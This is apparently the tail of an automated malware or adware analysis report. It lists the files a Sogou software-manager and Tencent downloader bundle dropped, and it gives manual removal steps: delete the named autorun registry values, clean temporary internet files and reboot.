%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_unconnected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mid.png (939 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\7.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\GIF\loading.gif (494 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress.gif (9 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\warning_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\SogouPDAInfo.sqlite3 (3624 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_dwn.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\btn_3state.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.gif (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_closebtn.png (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_fore.png (15817 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\download_bind_list_item.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_thu.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\dlg_settings.xml (6 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo4848default.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hand.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_trs.png (938 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple.png (285 bytes)
%Program Files%\SogouSoftware\3.1.13.79\DuiLib.dll (17602 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg_otherfont.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\2.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ready_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_pause.png (17448 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\6.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9 .png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon2.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\web_external_browser_dlg.xml (318 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\tooltips_dlg.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\download_list_item.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone.png (16 bytes)
%Program Files%\SogouSoftware\uninst.exe (794 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_banner.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\3.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\loading.gif (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\checkbox.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scroll.png (13 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\magnifier_search.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\8.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_active.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bigbtn_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\install_driver.gif (1568 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\apk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\finishbtn.png (817 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouAapt.exe (24085 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button160.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Ñ¡ÖÃÂ̬.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_5.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\APKlogo.ico (2610 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_item.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_4.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_nor.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\MySoftwareManager.xml (24 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_ready.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act_focus.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\guide_smt.png (2712 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_bg.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_connected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\adbdll.dll (2430 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_confirm_dlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\android_ver.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn.png (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ConfirmDlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_search.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DIFxAPI.dll (11174 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\recommend_classify_table.xml (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_3.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (2868107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (83 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (511 bytes)
%System%\GroupPolicy\gpt.ini (315 bytes)
%System%\GroupPolicy\Machine\Registry.pol (268 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QBDownload.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe (7972 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 842843" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\842843"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 800656" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\800656"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 806309" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\806309"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 816749" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\816749"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 761294" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\761294"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 825721" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\825721"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 732509" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\732509"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 776418" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\776418"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SogouSoftware" = "%Program Files%\SogouSoftware\SogouSoftware.exe /AutoRun"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.